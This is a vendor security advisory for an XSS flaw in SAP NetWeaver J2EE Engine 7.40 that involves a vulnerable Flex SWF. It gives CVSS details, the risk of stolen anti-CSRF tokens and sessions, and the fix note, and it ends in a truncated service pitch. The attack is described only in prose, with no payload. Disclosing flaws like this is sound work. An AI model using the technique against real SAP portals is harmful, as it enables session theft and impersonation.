[ERPSCAN-15-022] SAP NetWeaver 7.4 – XSS

Application: SAP NetWeaver J2EE Engine 7.40
Vendor URL: http://www.sap.com
Bugs: XSS
Reported: 13.07.2015
Vendor response: 24.07.2015
Date of Public Advisory: 09.09.2015
Reference: SAP Security Note 2176785
Authors: Roman Bezhan (ERPScan)

Class: Cross-Site Scripting, XSS [CWE-79]
Impact: information disclosure, still anti-SCRF tokens
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS Base Score: 4.3 / 10
CVSS Base Vector:

AV: Access Vector (Related exploit range) Network (N)
AC: Access Complexity (Required attack complexity) Medium (M)
Au: Authentication (Level of authentication needed to exploit) None (N)
C: Impact to Confidentiality None (N)
I: Impact to Integrity Partial (P)
A: Impact to Availability None (N)

Business Risk
A legitimate user of SAP can insert a malicious script into SAP and gain unauthorized access to the workstation of any user who opens the link.

The attacker can ask victims to visit a malicious site with special content, where external SWF and resourceModuleURLs attributes can force the vulnerable SWF of SAP NetWeaver Portal 7.4 to execute a query in the victim’s context and send private data to the attacker.
1) The attacker can steal anti-CSRF tokens and read private data.
2) The attacker can exploit XSS. Cross-site scripting can be used to steal another user’s authentication information, such as data related to their current session. An attacker who gains access to this data may use it to impersonate the user and access all information with the same rights as the targeted user. If an administrator is impersonated, the security of the application may be fully compromised.

SAP NetWeaver J2EE Engine 7.40
Other versions are probably affected too, but they were not checked.

To correct this vulnerability, install SAP Security Note 2176785

Cross-site scripting vulnerability in the Adobe Flex SDK 3.x and 4.x before 4.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to the loading of modules from different domains.


To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services: